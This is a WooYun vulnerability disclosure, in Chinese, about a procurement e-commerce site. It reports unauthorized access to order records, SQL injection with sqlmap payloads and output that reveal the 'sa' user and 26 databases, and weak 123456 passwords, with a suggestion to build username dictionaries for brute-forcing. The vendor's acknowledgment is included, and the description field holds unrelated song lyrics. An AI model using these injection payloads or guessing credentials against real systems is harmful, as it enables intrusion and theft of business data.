漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141412
漏洞标题:某采购电子商务网站多个漏洞打包(越权/注入/弱口令)
相关厂商:广东省信息安全测评中心
漏洞作者: 帅克笛枫
提交时间:2015-09-16 22:25
修复时间:2015-11-05 10:06
公开时间:2015-11-05 10:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开
简要描述:
~命运就算颠沛流离
命运就算曲折离奇
命运就算恐吓着你做人没趣味
别流泪 心酸 更不应舍弃
我愿能 一生永远陪伴你
哦~~
一生之中兜兜转转 那会看清楚
彷徨时我也试过独坐一角像是没协助
在某年 那幼小的我
跌倒过几多几多落泪在雨夜滂沱
一生之中弯弯曲曲我也要走过
从何时有你有你伴我给我热烈地拍和
像红日之火 燃点真的我
结伴行 千山也定能踏过~
详细说明:
访问:http://**.**.**.**/如图所示:
广东五洲采购电子商务有限公司,如图所示:
订单列表未授权可便利访问查看订单相关信息,访问链接:http://**.**.**.**:8089/buyer/makeorder.asp?purchasebill_id=18215,如图所示:
相关医用产品名称,规格,单价数量及采购金额都可以查看到,purchasebill_id=18215采购订单ID可进行遍历查看;订单链接存在布尔/时间注入,将链接地址放入sqlmap检测下,如图所示:
Place: GET
Parameter: purchasebill_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: purchasebill_id=58248 AND 9208=9208
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: purchasebill_id=58248; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: purchasebill_id=58248 WAITFOR DELAY '0:0:5'--
---
[20:32:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[20:32:04] [INFO] fetching current user
[20:32:04] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[20:32:04] [INFO] retrieved:
[20:32:04] [WARNING] reflective value(s) found and filtering out
sa
current user: 'sa'
[20:32:12] [INFO] fetching current database
[20:32:12] [INFO] retrieved: wzMaterialTrade_gz07_B
current database: 'wzMaterialTrade_gz07_B'
[20:32:55] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 92 times
[20:32:55] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin
output\**.**.**.**'
[*] shutting down at 20:32:55
当前用户sa,26个数据库,如图所示:
available databases [26]:
[*] DG_Govbid
[*] master
[*] material_jx2014
[*] material_XinYu2015
[*] material_yj2014
[*] model
[*] msdb
[*] tempdb
[*] test
[*] WZbiddingDB
[*] WzbiddingWeb
[*] WzMaterialDCDEMO
[*] wzMaterialTrade_gz07_A
[*] wzMaterialTrade_gz07_B
[*] wzMaterialTrade_JiangXi2013
[*] wzMaterialTrade_JiangXi2014
[*] wzMaterialTrade_JiangXi2015
[*] wzMaterialTrade_test
[*] wzMaterialTrade_XinYu2015
[*] wzMaterialTrade_YangJiang2012
[*] wzMaterialTrade_YangJiang2014
[*] wzMaterialTrade_YangJiang2015
[*] wzMaterialTrade_zh2008
[*] WzRecordJiangXi2014
[*] WZWEB
[*] WZWEB1
[20:35:29] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\**.**.**.**'
[*] shutting down at 20:35:29
漏洞证明:
可查看采购产品名称,价格,及采购公司等信息,如图所示:
数据列表比较多,不一一跑了,如图所示:
首页可以直接打开多个系统登录后台,如图所示:
相对应的数据库wzMaterialTrade_gz07_A,wzMaterialTrade_gz07_B,wzMaterialTrade_JiangXi2013,wzMaterialTrade_JiangXi2014,wzMaterialTrade_JiangXi2015,wzMaterialTrade_XinYu2015,wzMaterialTrade_YangJiang2012,wzMaterialTrade_YangJiang2014,wzMaterialTrade_YangJiang2015,wzMaterialTrade_zh2008,WzRecordJiangXi2014,其中WZWEB,多个用户使用弱口令密码123456,可根据相应的sj_,tbyj_等开头的用户名根据订单列表显示的采购商名称组合生成字典,跑下用户名和密码..
修复方案:
~修复~
版权声明:转载请注明来源 帅克笛枫@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-09-21 10:04
厂商回复:
非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。
最新状态:
暂无